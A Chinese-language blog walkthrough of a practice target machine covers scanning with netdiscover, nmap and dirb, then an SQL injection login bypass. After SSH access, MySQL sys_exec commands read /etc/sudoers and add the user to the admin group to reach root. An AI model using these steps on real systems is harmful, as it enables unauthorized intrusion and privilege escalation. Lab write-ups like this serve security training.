网络空间安全(羊)2

9 篇文章 4 订阅

扫描靶机

 netdiscover -r 靶机IP网段

在这里插入图片描述

nmap -sV 靶机IP

在这里插入图片描述

发现了80端口,可能存在网页

我们通过dirb对靶机进行隐藏网页进行探查

dirb http://靶机IP:端口

在这里插入图片描述

发现一个网页打开

在这里插入图片描述

需要用户名和密码

我们优先进行弱密码和判断是否存在注入点

启动burpsuite,修改设置

在这里插入图片描述

在这里插入图片描述

创建监听端口

在这里插入图片描述

进入burpsuite,修改监听端口或者创建add

在这里插入图片描述

开启监听

在这里插入图片描述

输入用户和密码,把数据导入到Repeater

在这里插入图片描述

判断是否存在注入点

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现密码处出现明显的改变,存在注入点。

输入万能密码
在这里插入图片描述

发现需要找到用户

可以通过w3af或者其他方式爆破出来

这里发现了john用户,然后配合万能密码登入

在这里插入图片描述

现在显示出john的密码,我们可以进行ssh登录

然后进行脱shell处理

在这里插入图片描述

进入后寻找有用的文件。这里发现了有login的php,进行查看。

在这里插入图片描述## 发现root密码为空

在这里插入图片描述

进入数据库

在这里插入图片描述

拷贝/etc/sudoers文件至tmp目录下

sqlselect sys_exec(“cat /etc/sudoers > /tmp/sudoers”)

在这里插入图片描述

赋予文件/tmp/suduers的拥有者为john

select sys_exec(“chown john /tmp/sudoers”)     
不加你看不了,这个文件可以看拥有sudo权限的组

在这里插入图片描述
在这里插入图片描述

查看文件

在这里插入图片描述

发现admin组具有sudo权限

进行提权,把john划分到admin组

select sys_exec(“usermod -a -G admin john”)

然后sudo su root 提权至root用户

在这里插入图片描述

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值